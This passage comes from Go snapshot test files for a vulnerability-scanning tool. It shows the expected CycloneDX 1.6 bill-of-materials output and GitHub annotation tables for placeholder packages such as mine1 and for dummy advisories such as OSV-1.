"licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": 
"CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", 
"references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { 
"organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something 
scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], 
"description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- 
[TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], 
"credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": 
"CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine3@0.10.2-rc", "type": "library", "name": "mine3", "version": "0.10.2-rc", "licenses": [], "purl": "pkg:npm/mine3@0.10.2-rc" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [], "detail": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [], "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- 
[TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- ================================================ FILE: internal/output/__snapshots__/githubannotation_test.snap ================================================ [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] --- 
[TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/multiple_sources_with_no_packages - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/no_sources - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_no_packages - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] --- [TestPrintGHAnnotationReport_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] --- [TestPrintGHAnnotationReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION 
|%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | 7.8 | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/third/lockfile::path/to/my/third/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | 
|%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/third/lockfile::path/to/my/third/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/third/lockfile::path/to/my/third/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- 
[TestPrintGHAnnotationReport_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/one_source_with_one_deprecated_package - 1] ::error file=path/to/lockfile::path/to/lockfile%0A+----------------+-----------------+------------+%0A| PACKAGE | CURRENT VERSION | DEPRECATED |%0A+----------------+-----------------+------------+%0A| deprecated-pkg | 1.0.0 | true |%0A+----------------+-----------------+------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | 
|%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.2 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| 
PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| mine3 | https://osv.dev/OSV-3 | | 0.4.1 | |%0A| mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.2 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| mine3 | https://osv.dev/OSV-3 | | 0.4.1 | |%0A| mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT 
VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/third/lockfile::path/to/my/third/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| author1/mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| author1/mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.2 | |%0A+---------------+-----------------------+------+-----------------+---------------+::error 